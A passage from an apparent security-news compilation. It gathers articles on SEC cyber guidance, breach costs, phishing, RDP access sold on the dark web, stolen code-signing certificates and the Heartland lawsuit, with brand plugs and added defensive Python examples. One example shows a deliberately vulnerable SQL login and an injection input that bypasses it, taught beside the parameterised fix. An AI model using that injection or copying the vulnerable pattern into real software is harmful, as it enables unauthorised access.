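        flags.append("unusual-hour")
    return flags


def decide(req: Request, base: Baseline) -> dict:
    """Access-proxy decision: allow only when the request's effective trust
    tier meets the application's minimum. The verdict carries its evidence."""
    required = APP_MIN_TIER.get(req.app)
    flags = login_anomalies(req, base)
    tier = device_tier(req.device)
    if required is None:
        return {"allow": False, "reason": "unknown-app", "tier": tier, "flags": flags}
    if not req.mfa_passed:
        return {"allow": False, "reason": "mfa-required", "tier": tier, "flags": flags}
    # Anomalous context lowers the effective tier by one rather than denying
    # outright: a healthy managed device seen from an unexpected place can
    # still reach low-sensitivity apps, but not the crown jewels.
    effective = tier - (1 if flags else 0)
    allow = effective >= required
    return {
        "allow": allow,
        "reason": "ok" if allow else f"tier {effective} below required {required}",
        "tier": tier,
        "effective": effective,
        "flags": flags,
    }


if __name__ == "__main__":
    base = Baseline(frozenset({"GB"}), frozenset(range(7, 20)))
    laptop = Device(managed=True, disk_encrypted=True, patch_age_days=5, has_device_cert=True)
    print(decide(Request("alice", True, laptop, "GB", "payroll", stamp(10)), base))
    print(decide(Request("alice", True, laptop, "RU", "payroll", stamp(3)), base))
```

The segmentation point from the article (users only reach the applications they are approved for) is the APP_MIN_TIER table: a compromised tier-1 device can never be used to reach payroll, which is what "limiting the blast radius" means in practice.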
SEC Cybersecurity Update May Lead to Increased Oversight
https://www.infosecurity-magazine.com/opinions/sec-update-increased-oversight/
In direct response to an unprecedented streak of massive data breaches and security incidents, the SEC recently released a statement and guidance on public company cybersecurity disclosures. The SEC's guidance has two major focuses: the importance of cybersecurity policies and procedures and the application of insider trading prohibitions in the cybersecurity context.
While signals are mixed, the SEC appears to view cybersecurity policy and practice as central to protecting markets. To quote from the SEC's February statement: “Today, the importance of data management and technology to business is analogous to the importance of electricity and other forms of power in the past century.”
Prognosis
To be clear, the updated guidance is not a formal regulation, so companies may choose to review and fix policy management issues — or they may ignore it altogether. Savvy corporate information security executives will internalize that this pointed focus on cybersecurity means increased oversight is soon to follow. We see this guidance as a precursor to regulations that could grow into a regime on par with SOX.
This prediction is supported by a few key factors:
Precedent — The New York State Department of Financial Services, 23 NYCRR 500, Cybersecurity Requirements for Financial Services Companies. See also state-level notification laws and the EU’s GDPR.
Avalanche — Financial sector breaches have tripled in five years.
Driver — Investors are seeking risk awareness to ensure they have all the facts for prudent investments.
Most experts and market watchers are discussing the SEC guidance in terms of how public companies will and should react to it. The untold story is that the guidance is likely a precursor to increased oversight. We’ve seen it happen in other sectors with governing bodies, such as in financial services with the FFIEC.
The SEC’s renewed focus on cybersecurity and data breaches is a good news/bad news scenario for CISOs. CISOs can leverage the gravity of SEC oversight into increased visibility and authority in the boardroom, as CEOs and CFOs now have greater risk management responsibility and accountability to investors. On the other hand, CISOs also now face heightened scrutiny and greater accountability, including the potential for more significant personal penalties.
Questions and Concerns
Most public companies are already straining under the weight of regulatory burdens and have invested heavily in their cybersecurity defenses. What more can they do?
The SEC guidance can be seen as a response to, and hedge against, the negative impact of massive breaches on public trust – already at a remarkably low point. Headline-worthy breaches keep happening. The full fallout from the Equifax disaster may still be coming. Target still finds itself getting press five years after its data breach.
While public companies have less and less say over what they disclose, it is important to examine the trust issue from a strategic standpoint: What effect will more disclosures have? What will happen to companies that fail to disclose in a timely and transparent manner? The SEC has already provided one answer, in the form of a $35 million penalty against Altaba (Yahoo) for failing to disclose a massive breach in 2014.
Urging public companies to do a better job of incident response, through integrated policies, procedures, controls, and collaboration, in the event of a breach or cyber-attack is only one part of the guidance.
Another major area of focus is risk management — the SEC emphasizes that investors have a right to be notified of major risk factors, even before a negative event occurs. This means public companies, which often leverage complex global supply chains, will likely need to improve their enterprise risk management programs to gain the visibility and agility required to achieve a proactive state.
Answers and Insights
The next step is to integrate all the components — cybersecurity, data privacy, data integrity, compliance, audit, business resiliency and third-party management — merging and managing them through an integrated risk management program and solution.
These technology platforms support risk management effectiveness and policy management best practices, a core aspect of the SEC update. Organizations with solid integrated risk management programs are able to leverage their visibility into various components (vendor risk, audits, etc.) to make IT risk management more effective and actionable.
By systematically linking policies to controls, it becomes easier to prove compliance and diligence. The linkages provide a defensible record, essential to withstanding public scrutiny and investigations. Everything can be documented, from the publication and distribution of policies to training and testing, and then investigation, corrective actions, and follow-up reports.
Moreover, policies managed through integrated risk management solutions can be created and updated efficiently in response to business or regulatory changes.
A quick scan of the SEC guidance (and most other cybersecurity directives) reveals a daunting number of details and convoluted processes that need to be addressed. That’s why automation is so vital to achieve excellence in risk management.
Streamlining workflows, centralizing documentation, freeing data from silos, and systematizing processes — all these capabilities save time and money, but they also increase visibility across the enterprise, enable collaboration, and bridge vulnerable gaps.
In the end, the issues raised by the SEC’s updated guidance are important for every organization. Cultivating corporate responsibility, sustaining consumer trust, protecting valuable data assets, and maintaining the integrity of critical ecosystems are all essential to long-term success and competitive advantage.
Digging deep to identify vulnerabilities, track improvements and outcomes, and ensure accountability will create a stronger, more resilient organization.
IBM: A data breach will now cost your organization $3.86 million, if you're lucky
See wavesys.com on how to use better cybersecurity and prevent potential enormous future breach costs. imo.
https://www.zdnet.com/article/ibm-a-data-breach-will-now-cost-your-organization-3-86-million/
There are hidden costs over time which make the bill far larger than you may expect.
A new global study conducted by IBM suggests the financial impact of a data breach for an organization is, on average, $3.86 million.
However, in the worst cases, "mega breaches" may cost the enterprise between $40 million and $350 million.
IBM's 2018 Cost of a Data Breach Study, conducted in conjunction with the Ponemon Institute, suggests that the cost can become this high not due to the obvious damage caused to systems -- or the theft of information at the time of a breach -- but rather due to more subtle expenses incurred by an organization.
A loss of reputation may deter potential future customers, current business relationships may falter, and the time employees must spend on damage control -- as well as retraining and education -- may all rack up the bill.
According to the study, the average cost of a data breach, $3.86 million, has increased by 6.4 percent from 2017.
After interviewing close to 500 companies which have experienced a data breach, the study calculated that this is the average cost when under 100,000 records are compromised in a cybersecurity incident.
The average time it takes to uncover a data breach is 197 days, and once a breach is identified, it takes roughly 69 days to contain.
However, the speed of incident response teams can have a huge impact on the overall cost of a data breach.
When a breach is contained in less than a month, IBM suggests businesses may be able to save up to $1 million in comparison to slower companies.
The number of records stolen also has an effect. On average, each record costs $148, but this cost can be mitigated by having an incident response team on hand, as well as by implementing artificial intelligence (AI)-based cybersecurity solutions.
"Organizations that had extensively deployed automated security technologies saved over $1.5 million on the total cost of a breach," IBM says.
The study has also examined the cost of so-called "mega breaches," in which cyberattacks result in the loss of one million to 50 million records. In these cases, enterprise players can expect to lose between $40 million and $350 million -- but one-third of this estimated cost is caused by lost business.
A recent IBM/Harris poll suggested that 75 percent of US consumers would not do business with a company they did not believe would take adequate measures to protect their data. When you consider that this aversion may be for years -- or permanent -- the true cost of data breaches to an organization may be incalculable.
Based on 11 companies experiencing this level of a data breach in the past two years -- such as Equifax and Target -- the study suggests that the majority of these security incidents are malicious rather than caused by human error, and the average time to detect and contain a breach was 365 days.
"While highly publicized data breaches often report losses in the millions, these numbers are highly variable and often focused on a few specific costs which are easily quantified," said Wendi Whitmore, Global Lead for IBM X-Force Incident Response and Intelligence Services (IRIS). "The truth is there are many hidden expenses which must be taken into account such as reputational damage, customer turnover, and operational costs."
"Knowing where the costs lie, and how to reduce them, can help companies invest their resources more strategically and lower the huge financial risks at stake," the executive added.
Hackers dangle a wide variety of phishing hooks beyond email
Wave VSC 2.0 could help protect companies' computers in the face of the phishing that is presented in this article.
https://www.wavesys.com/products/wave-virtual-smart-card
https://www.itproportal.com/features/hackers-dangle-a-wide-variety-of-phishing-hooks-beyond-email/
Browsers and browser users are the new OS that need increased protection in order to stop phishing that leads to breaches and other damage
A recent report from Barracuda Networks found that 87 per cent of respondents faced an attempted email-based phishing attack in the past year, making it clear that email-based phishing continues to be a major threat vector. But what happens when improved security defences and employee awareness training make email phishing threats less likely to succeed? Well, if nothing else, hackers are smart and resourceful. They just change to phishing tactics beyond email.
Today, most security teams are finally becoming more aware of the large and growing threat of sophisticated phishing attacks that tempt employees outside of email. This new and fast-evolving attack vector targets users with increasingly sophisticated phishing attacks delivered via ads, search results, pop-ups, browser extensions, social media, chat applications, “free” web apps, and more.
Such sneaky socially engineered attacks often appear in an “arena of trust,” like a legitimate website or social media application. They deceive employees into offering up personal credentials or visiting malicious web pages that compromise their browsers and do keylogging and other malevolent actions that are hard for traditional security solutions to detect.
Hackers are preying on human fallibility with HTML-based attacks that evade existing defences by design. Disguised as legitimate web traffic, they slip through firewalls and secure web gateways. And with these new phishing campaigns typically lasting just hours, existing threat-based defences can’t keep up with fast-moving attacks. In essence, browsers and browser users are the new OS that need increased protection in order to stop phishing that leads to breaches and other damage.
New types of phishing attacks are on the rise
The growing use of the Web, SaaS applications, social media, and other Internet-based resources for daily tasks is making it an increasingly appealing attack vector for hackers. While employees are on the Web or using social media, they are vulnerable to a growing variety of complex phishing attacks outside of their inbox. And with devices such as laptops and phones increasingly being dual-use devices, used for both business and personal purposes, compromises that take place during personal time can compromise a device and help hackers gain entry into corporate networks.
Here is a brief roundup of the most common types of phishing attacks beyond email on the rise today, and why organisations should be on the alert.
Fake logins and credential stealing
It starts out looking real enough. You search for a login page for your Facebook, Google, or Dropbox account at work and come across what appears to be a legitimate page, so you enter your credentials into the phony login. This mistake makes you fair game for attackers to steal your info and get access to your critical files and passwords, and possibly even infiltrate the larger corporate network.
In the example below, attackers provide a custom Dropbox phishing page that allows users to gain access through the trusted email login source of their choice. Regardless of the selection, once the user enters his or her credentials in any of the above logins, the form submits the stolen information through a PHP script with the same name as the pop-up HTM file. In each PHP script, the attacker has written code to send the collected information to this email address.
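The fake-login page the article describes has the same shape as most credential-phishing kits: a page branded as a well-known service, served from a domain the brand does not own, with a form that posts the password somewhere the user did not intend. As an added example (not from the article or from any vendor product), here is a small heuristic checker that a web proxy or URL-scanning service could run over a fetched page. It parses the HTML with the standard library, finds forms that collect a password, and reports three red flags: brand wording on a host that does not belong to the brand, credentials posted to a different site than the page itself, and credentials posted over plain HTTP. The brand table, the sample pages and the `.example` hostnames are all constructed.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse

# Brands that phishing kits commonly imitate, mapped to the registrable
# domain that legitimately hosts their sign-in page (constructed list).
BRAND_DOMAINS = {
    "dropbox": "dropbox.com",
    "google": "google.com",
    "facebook": "facebook.com",
}


class LoginFormParser(HTMLParser):
    """Collects every <form> that contains a password field, plus page text."""

    def __init__(self):
        super().__init__()
        self.forms = []
        self.text = []
        self._form = None

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "form":
            self._form = {"action": a.get("action", ""), "has_password": False}
        elif tag == "input" and self._form is not None:
            if a.get("type", "").lower() == "password":
                self._form["has_password"] = True

    def handle_endtag(self, tag):
        if tag == "form" and self._form is not None:
            if self._form["has_password"]:
                self.forms.append(self._form)
            self._form = None

    def handle_data(self, data):
        self.text.append(data.lower())


def registrable(host):
    """Crude eTLD+1 (last two labels): fine for .com demos, wrong for co.uk."""
    parts = host.lower().split(".")
    return ".".join(parts[-2:]) if len(parts) >= 2 else host.lower()


def assess_login_page(page_url, html):
    """Returns a list of findings; an empty list means no heuristic fired."""
    parser = LoginFormParser()
    parser.feed(html)
    page_host = urlparse(page_url).hostname or ""
    page_domain = registrable(page_host)
    text = " ".join(parser.text)
    findings = []
    # 1. Brand wording on a host the brand does not own.
    for brand, domain in BRAND_DOMAINS.items():
        if brand in text and page_domain != domain:
            findings.append(f"{brand} sign-in branding on {page_host}")
    for form in parser.forms:
        target = urlparse(urljoin(page_url, form["action"]))
        target_host = target.hostname or ""
        # 2. Credentials posted to a different site than the page itself.
        if registrable(target_host) != page_domain:
            findings.append(f"credentials posted off-site to {target_host}")
        # 3. Credentials posted over plaintext HTTP.
        if target.scheme != "https":
            findings.append(f"credentials posted over {target.scheme} to {target_host}")
    return findings


# Constructed sample pages: a lookalike kit and the genuine sign-in page.
PHISH_URL = "http://dropbox-secure-verify.example/login.htm"
PHISH_HTML = """<html><head><title>Dropbox - Sign in</title></head><body>
<h1>Sign in to Dropbox</h1>
<form method="post" action="login.php">
  <input type="email" name="login_email">
  <input type="password" name="login_password">
  <input type="submit" value="Sign in">
</form></body></html>"""

LEGIT_URL = "https://www.dropbox.com/login"
LEGIT_HTML = """<html><head><title>Dropbox - Sign in</title></head><body>
<form method="post" action="https://www.dropbox.com/ajax_login">
  <input type="email" name="login_email">
  <input type="password" name="login_password">
</form></body></html>"""

if __name__ == "__main__":
    print(assess_login_page(PHISH_URL, PHISH_HTML))   # two findings
    print(assess_login_page(LEGIT_URL, LEGIT_HTML))   # []
```

Heuristics like these are a first filter, not a verdict: legitimate sites do sometimes post credentials to a separate authentication domain, so the off-site rule needs an allow-list in production, and a kit served over HTTPS from a lookalike domain only trips the branding rule. The value is that all three checks run on the page content itself, which is what a fast-moving campaign still has to put in front of the user.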
Malicious browser extensions and ads
According to a recent report, Google says it removed 3.2 billion ads from its platforms in 2017, nearly double the total number of “bad ads” from just a year earlier. That equates to removing about 100 ads per second.
Google also reported that cybercriminals infected more than 100,000 computers with browser extensions that stole login credentials, mined cryptocurrencies, and engaged in click fraud. The malicious extensions were hosted in Google’s official Chrome Web Store. These browser extensions and related HTML malware are often promoted via ads, search engines, and social media to trick users through increasingly sophisticated and trustworthy social engineering methods.
rest at link -
Hackers can purchase government login credentials for cheap on the dark web
https://www.wavesys.com/products/wave-virtual-smart-card
Excerpt:
What can it be used for?
What do you use your smart card for today? With the exception of keying open the door at work, Wave Virtual Smart Card can perform any of the services or applications you rely on your smart card for today. Secure VPN, WiFi, remote desktop, cloud applications – it can all be done with a virtual smart card.
https://www.digitaltrends.com/computing/mcafee-hackers-buy-remote-desktop-access-dark-web/
McAfee’s Advanced Threat Research team recently discovered that hackers have access to many organizations that have weak credentials when using Microsoft’s Remote Desktop component in Windows-based systems. Access to these organizations — whether it’s an airport, a hospital or the U.S. government — can be bought for little money through specific shops on the dark web.
Microsoft’s Remote Desktop Protocol (RDP) essentially allows you to connect and use a Windows-based PC from a remote location. When those login credentials are weak, hackers can use brute force attacks to gain the username and password for each connection. McAfee found connections up for sale across various RDP shops on the dark web ranging between a mere 15 to a staggering 40,000 connections.
“The advertised systems ranged from Windows XP through Windows 10,” says John Fokker, McAfee’s Head of Cyber Investigations. “Windows 2008 and 2012 Server were the most abundant systems, with around 11,000 and 6,500, respectively, for sale. Prices ranged from around $3 for a simple configuration to $19 for a high-bandwidth system that offered access with administrator rights.”
Among the list of devices, services and networks on the menu are multiple government systems on sale worldwide, including those linked to the United States. The team found connections to a variety of healthcare institutions including medical equipment shops, hospitals, and more. They even found access to security and building automation systems at a major international airport selling for a mere $10.
The problem doesn’t just revolve around desktops, laptops, and servers. Internet of Things devices based on Windows Embedded are also on the menu such as point-of-sale systems, kiosks, parking meters, thin client PCs and more. Many are overlooked and not updated, making them a quiet entryway for hackers.
Black market sellers gain RDP credentials by scanning the internet for systems that accept RDP connections, and then use tools like Hydra, NLBrute and RDP Forcer to attack the login using stolen credentials and password dictionaries. Once they successfully log into the remote PC, they don’t do anything but put the connection details up for sale.
After hackers pay for a connection, they can bring a corporation down to its knees. For instance, a hacker could pay a mere $10 for a connection, infiltrate the network to encrypt the files of every PC, and demand a $40,000 ransom. Compromised PCs can also be used to deliver spam, misdirect illegal activity and mine cryptocurrency. Access is also good for stealing personal information and company trade secrets.
“We found a newly posted Windows Server 2008 R2 Standard machine on the UAS Shop,” Fokker writes. “According to the shop details, it belonged to a city in the United States and for a mere $10 we could get administrator rights to this system. UAS Shop hides the last two octets of the IP addresses of the systems it offers for sale and charges a small fee for the complete address.”
The solution, according to McAfee, is that organizations need to do a better job at checking all their virtual “doors and windows” so hackers can’t sneak in. Remote access should be secure and not easily exploitable.
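The sellers described above get their inventory by brute-forcing exposed RDP logins, and the McAfee advice amounts to finding those doors before someone else does. The defender's side of that is visible in the Windows Security log: a burst of logon failures (event 4625) from one source, followed, if the guess succeeds, by a logon success (event 4624) from the same source. The following is an added example, not from the article or from McAfee: a sliding-window detector run over constructed, flattened renderings of those events (real events are XML in the EVTX store; only the fields needed here are kept). The IP addresses are documentation ranges and the usernames are made up.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed, flattened renderings of Windows Security log events:
# 4625 = logon failure, 4624 = logon success. LogonType 10 is
# RemoteInteractive (RDP); failures during NLA pre-authentication show
# up as LogonType 3 instead, so both types are counted.
SAMPLE_LOG = """\
2018-07-09T02:14:01Z EventID=4625 LogonType=10 TargetUserName=administrator IpAddress=203.0.113.45
2018-07-09T02:14:07Z EventID=4625 LogonType=10 TargetUserName=admin IpAddress=203.0.113.45
2018-07-09T02:14:12Z EventID=4625 LogonType=10 TargetUserName=Administrator IpAddress=203.0.113.45
2018-07-09T02:14:20Z EventID=4625 LogonType=10 TargetUserName=scanner IpAddress=203.0.113.45
2018-07-09T02:14:31Z EventID=4625 LogonType=10 TargetUserName=backup IpAddress=203.0.113.45
2018-07-09T02:15:02Z EventID=4625 LogonType=10 TargetUserName=administrator IpAddress=203.0.113.45
2018-07-09T02:16:40Z EventID=4624 LogonType=10 TargetUserName=administrator IpAddress=203.0.113.45
2018-07-09T08:03:15Z EventID=4625 LogonType=10 TargetUserName=jsmith IpAddress=198.51.100.7
2018-07-09T08:03:40Z EventID=4624 LogonType=10 TargetUserName=jsmith IpAddress=198.51.100.7
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) EventID=(?P<event>\d+) LogonType=(?P<ltype>\d+) "
    r"TargetUserName=(?P<user>\S+) IpAddress=(?P<ip>\S+)$"
)


def parse_events(text):
    """Parses the flattened format above; lines in other formats are skipped."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        d = m.groupdict()
        d["ts"] = datetime.strptime(d["ts"], "%Y-%m-%dT%H:%M:%SZ")
        d["event"] = int(d["event"])
        d["ltype"] = int(d["ltype"])
        events.append(d)
    return sorted(events, key=lambda e: e["ts"])


def detect_rdp_bruteforce(events, threshold=5, window=timedelta(minutes=5)):
    """Counts RDP logon failures per source IP inside a sliding window.
    Emits one 'burst' alert per IP per window, and a 'success-after-burst'
    alert when that IP then logs in successfully (the case worth paging on).
    The distinct-user count separates a password spray (many users, few
    guesses each) from a dictionary attack against one account."""
    recent = defaultdict(deque)   # ip -> deque of (timestamp, username) failures
    alerted_until = {}            # ip -> end of the window already reported
    alerts = []
    for e in events:
        if e["ltype"] not in (3, 10):
            continue
        ip, ts = e["ip"], e["ts"]
        q = recent[ip]
        while q and ts - q[0][0] > window:
            q.popleft()
        if e["event"] == 4625:
            q.append((ts, e["user"].lower()))
            if len(q) >= threshold and alerted_until.get(ip, datetime.min) < ts:
                users = {u for _, u in q}
                alerts.append({"type": "burst", "ip": ip, "failures": len(q),
                               "distinct_users": len(users), "first": q[0][0], "last": ts})
                alerted_until[ip] = ts + window
        elif e["event"] == 4624 and len(q) >= threshold:
            alerts.append({"type": "success-after-burst", "ip": ip, "user": e["user"],
                           "at": ts, "prior_failures": len(q)})
    return alerts


if __name__ == "__main__":
    for a in detect_rdp_bruteforce(parse_events(SAMPLE_LOG)):
        print(a)
```

On the sample data the first host trips the burst alert on its fifth failure and then a success-after-burst alert when the sixth guess works; the second host, one mistyped password followed by a normal login, produces nothing. The same logic is easy to express as a scheduled query in whatever SIEM collects the 4625/4624 events, and the systems that matter most for it are exactly the ones the article lists: servers, embedded Windows devices and anything else that accepts RDP from the internet.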
Stolen certificates from D-Link used to sign password-stealing malware
Wave VSC 2.0 - https://www.wavesys.com/products/wave-virtual-smart-card
Wave Endpoint Monitor - https://www.wavesys.com/malware-protection
https://arstechnica.com/information-technology/2018/07/stolen-certificates-from-d-link-used-to-sign-password-stealing-malware/
This isn't the IP camera software you think it is.
Criminals recently stole code-signing certificates from router and camera maker D-Link and another Taiwanese company and used them to pass off malware that steals passwords and backdoors PCs, a researcher said Monday.
The certificates were used to cryptographically verify that legitimate software was issued by D-Link and Changing Information Technology. Microsoft Windows, Apple’s macOS, and most other operating systems rely on the cryptographic signatures produced by such certificates to help users ensure that executable files attached to emails or downloaded on websites were developed by trusted companies rather than malicious actors masquerading as those trusted companies.
Somehow, members of an advanced persistent-threat hacking group known as BlackTech obtained the certificates belonging to D-Link and Changing Information Technology, the researcher with antivirus provider Eset said in a blog post. The attackers then used the certificates to sign two pieces of malware, one a remotely controlled backdoor and the other a related password stealer. Both pieces of malware are referred to as Plead and are used in espionage campaigns against targets located in East Asia. The Japan Computer Emergency Response team recently documented the Plead malware here. AV provider Trend Micro recently wrote about BlackTech here.
“The ability to compromise several Taiwan-based technology companies and reuse their code-signing certificates in future attacks shows that this group is highly skilled and focused on that region,” Eset researcher Anton Cherepanov wrote in Monday’s post.
Don’t try this at home
In a support announcement, D-Link officials said that two separate code-signing certificates were recently misappropriated by a “highly active cyber espionage group.” The post said most D-Link customers won’t be affected by the theft, but it also suggested some people may experience errors when viewing mydlink IP cameras within Web browsers. Company engineers are in the process of releasing updated firmware to fix the errors. People using mydlink mobile applications aren’t affected.
Both D-Link and Changing Information Technology have revoked the stolen certificates. Until the D-Link firmware is issued, the company’s support announcement is advising people who want to use browsers to view their affected D-Link cameras to temporarily ignore the certificate revocation warnings. This is bad advice that could be abused by malware operators. Users should disregard it.
The best-known example of malware that abused stolen code-signing certificates was the Stuxnet worm that targeted Iran’s nuclear enrichment program almost a decade ago. The malware used legitimate certificates belonging to RealTek and JMicron which are both, like D-Link and Changing Information Technology, known technology companies based in Taiwan.
Last year, researchers published research that showed that malware signed by OS-trusted code-signing certificates was more common than most people assumed, with the first known instance occurring in 2003. Earlier this year, researchers documented several underground services that sold counterfeit signing credentials that are unique to each buyer. The thefts reported Monday are an indication that misappropriated certificates remain a widely used technique for concealing malicious software.
Stolen Taiwanese Certs Used in Malware Campaign
https://www.infosecurity-magazine.com/news/stolen-taiwanese-certs-used/?utm_source=dlvr.it&utm_medium=twitter
Security researchers have discovered yet another cyber-attack campaign using stolen certificates to circumvent traditional security tools.
The tactic was being used to launch a remotely controlled backdoor dubbed Plead and a related password stealer, according to Eset senior malware researcher, Anton Cherepanov.
Plead was spotted last year being used by a group known as BlackTech to compromise targets in East Asia including Hong Kong, Japan and Taiwan, and as such could be a Beijing-backed venture.
Two certificates were used to sign the malware, one belonging to Taiwanese security company Changing Information Technology and another issued by D-Link.
“We spotted this malware campaign when our systems marked several files as suspicious. Interestingly, the flagged files were digitally signed using a valid D-Link Corporation code-signing certificate. The exact same certificate had been used to sign non-malicious D-Link software; therefore, the certificate was likely stolen,” explained Cherepanov.
After being notified of the discovery, D-Link revoked the certificate last week, he added.
However, BlackTech is still using the Changing Information Technology certificate, despite it also having been revoked last week.
Kevin Bocek, chief cybersecurity officer at Venafi, pointed out that the use of stolen certificates is not new and was in fact popularized by the Stuxnet authors.
“If you steal trusted machine identities from global technology companies, you can execute highly effective attacks that don’t raise any alarms. This is just one more demonstration of how machine identities, in this case code signing certificates, are being abused by malicious actors. There’s no doubt we’re going to see a lot more of these attacks in the future,” he added.
“Code-signing certificates are often a core component of DevOps and cloud infrastructure; and because organizations are using a lot more machine identities, these risks will only grow. In fact, researchers are already seeing a dramatic rise in the trade of stolen code-signing certificates on the dark web.”
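Both articles above turn on one point that signature checking alone does not capture: a signature made with a stolen certificate is cryptographically perfect, so the only things that separate the malware from the vendor's real software are the revocation list and the time the signature was made. The following is an added example, not code from Eset, D-Link or either article, that walks through that verification policy. Because the standard library has no RSA or ECDSA, a per-certificate HMAC secret stands in for the key pair; the certificate serial, subject, dates and revocation entry are all constructed, and the policy follows the general shape of Authenticode-style checking (a countersigned signature made before the revocation date stays valid) rather than any vendor's exact rules. The `check_revocation=False` path shows what "temporarily ignore the certificate revocation warnings" amounts to.

```python
import hashlib
import hmac
import json
from datetime import datetime

# Stand-in for CA-issued code-signing certificates. A real certificate
# carries an RSA/ECDSA public key and the signature is made with the
# matching private key; here an HMAC secret plays both roles so the
# example runs on the standard library alone. All values are constructed.
CERTS = {
    "vendor-cert-001": {
        "subject": "Example Device Vendor Corp.",   # hypothetical vendor
        "key": b"vendor-cert-001-secret",
        "not_before": datetime(2017, 1, 1),
        "not_after": datetime(2020, 1, 1),
    }
}

# Certificate revocation list: serial -> (revocation date, reason). The CA
# can set the date back to when the key is believed to have leaked, so
# everything signed after that point is cut off at once.
CRL = {"vendor-cert-001": (datetime(2018, 6, 1), "keyCompromise")}


def _canonical(payload):
    return json.dumps(payload, sort_keys=True, default=str).encode()


def sign(binary, serial, signing_time, countersigned):
    """Builds a signature blob the way a signer would. Used here only to
    construct test inputs; verify() is the point of the example."""
    payload = {
        "digest": hashlib.sha256(binary).hexdigest(),
        "serial": serial,
        "signing_time": signing_time,
        # True when a trusted timestamp authority countersigned the signature,
        # so the signing time is not merely the signer's own claim.
        "timestamped": countersigned,
    }
    mac = hmac.new(CERTS[serial]["key"], _canonical(payload), "sha256").hexdigest()
    return {"payload": payload, "mac": mac}


def verify(binary, blob, check_revocation=True):
    """Returns (trusted, reason). Every step before the revocation check
    passes for malware signed with a stolen certificate."""
    p = blob["payload"]
    cert = CERTS.get(p["serial"])
    if cert is None:
        return False, "unknown-issuer"
    expected = hmac.new(cert["key"], _canonical(p), "sha256").hexdigest()
    if not hmac.compare_digest(expected, blob["mac"]):
        return False, "bad-signature"
    if hashlib.sha256(binary).hexdigest() != p["digest"]:
        return False, "digest-mismatch"          # file altered after signing
    st = p["signing_time"]
    if not (cert["not_before"] <= st <= cert["not_after"]):
        return False, "outside-validity"
    if check_revocation and p["serial"] in CRL:
        revoked_at, reason = CRL[p["serial"]]
        # A countersigned signature made before the revocation date stays
        # valid; a claimed earlier time without a countersignature does not.
        if not (p["timestamped"] and st < revoked_at):
            return False, f"revoked ({reason})"
    return True, "ok"


if __name__ == "__main__":
    firmware = b"constructed vendor firmware image"
    stealer = b"constructed password-stealer binary"
    good = sign(firmware, "vendor-cert-001", datetime(2018, 3, 10), countersigned=True)
    bad = sign(stealer, "vendor-cert-001", datetime(2018, 6, 20), countersigned=True)
    print(verify(firmware, good))                          # (True, 'ok')
    print(verify(stealer, bad))                            # (False, 'revoked (keyCompromise)')
    print(verify(stealer, bad, check_revocation=False))    # (True, 'ok')
```

The last line is the problem with the support-page advice in the first article: with revocation ignored, the vendor's genuine software and the signed malware are indistinguishable, since the only check that tells them apart is the one being switched off.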
Security Firm Sued for Failing to Detect Malware That Caused a 2009 Breach
If the cyber-insurance companies (Eg AXA) properly incentivized businesses to use superior cybersecurity with companies such as Wave Systems (wavesys.com), these types of lawsuits mentioned in the article could be avoided. imo.
https://www.bleepingcomputer.com/news/security/security-firm-sued-for-failing-to-detect-malware-that-caused-a-2009-breach/
Two insurance companies are suing a cyber-security firm to recover insurance fees paid to a customer after the security firm failed to detect malware on the client's network for months, an issue that led to one of the biggest security breaches of the 2000s. The security firm says the lawsuit is meritless.
The two insurance firms are Lexington Insurance Company and Beazley Insurance Company, and both insured Heartland Payment Systems, a leading payment processing company.
Lawsuit related to 2009 Heartland mega breach
In January 2009, Heartland announced a major security breach of its network, following which an attacker stole details for over 100 million payment cards stored on its systems by over 650 of Heartland's customers.
Following this devastating hack and one of the biggest of the 2000s, Heartland paid over $148 million in settlement fees for various lawsuits, and other remediation costs and expenses Heartland owed its customers.
As part of their insurance agreements, the two firms paid $30 million to Heartland in the hack's aftermath, with the Lexington Insurance Company footing a $20 million bill, and the Beazley Insurance Company paying another $10 million.
Lawsuit claims Trustwave failed to detect intrusion
But now, according to a civil lawsuit filed on June 28 in Illinois, and first reported by the Cook County Record, the two companies are trying to recover those costs, and are claiming that the security firm with which Heartland had a service contract had failed to honor its agreement.
The two insurance firms claim that Chicago-based Trustwave Holdings, Inc. —the security firm— had failed to detect that an attacker used an SQL injection attack to breach Heartland's systems on July 24, 2007.
Furthermore, the two say Trustwave also failed to detect that attackers installed malware on the payments processor's servers on May 14, 2008, and did not raise a sign of alarm about the event.
The lawsuit points out that Trustwave did not detect any signs of suspicious activity during the security audits it provided to Heartland for almost two years as part of its contracts, which also included testing for PCI DSS compliance and attestation.
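The lawsuit names an SQL injection as the initial entry point. That class of bug comes from one coding pattern, and the fix is equally specific, so here is an added example (not from the article, the lawsuit or any Heartland or Trustwave code) showing the two side by side against an in-memory SQLite table. The table, the account and the placeholder password hash are constructed; the point is that the parameterised version sends the user's input to the database as data, so nothing typed into the form can change the structure of the query.

```python
import sqlite3


def make_db():
    """In-memory users table holding one constructed account."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password_hash TEXT)")
    # Placeholder value; a real system stores a salted, slow password hash.
    conn.execute("INSERT INTO users VALUES (?, ?)", ("alice", "hash-of-correct-password"))
    conn.commit()
    return conn


def login_vulnerable(conn, username, password_hash):
    """The pattern behind injection breaches: user input is pasted into the
    SQL text, so input containing quote characters or comment markers can
    rewrite the WHERE clause instead of being compared as a value."""
    query = (f"SELECT COUNT(*) FROM users WHERE username = '{username}' "
             f"AND password_hash = '{password_hash}'")
    return conn.execute(query).fetchone()[0] > 0


def login_safe(conn, username, password_hash):
    """Parameterised query: the driver sends the values separately from the
    SQL text, so the same input is only ever compared as data."""
    query = "SELECT COUNT(*) FROM users WHERE username = ? AND password_hash = ?"
    return conn.execute(query, (username, password_hash)).fetchone()[0] > 0


if __name__ == "__main__":
    db = make_db()
    # A username carrying a quote and a comment marker; the rest of the
    # vulnerable query's WHERE clause, including the password check, is lost.
    probe = "alice' --"
    print(login_vulnerable(db, probe, "wrong"))   # True: check bypassed
    print(login_safe(db, probe, "wrong"))         # False: treated as a literal name
```

A code review or a web-application scan that flags string-built SQL is the cheap control here; the PCI DSS items listed further down in the article (firewalls, default passwords, unique IDs, monitoring) are the layers that are supposed to catch what a single bug lets through.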
Visa report suggests Trustwave's fault
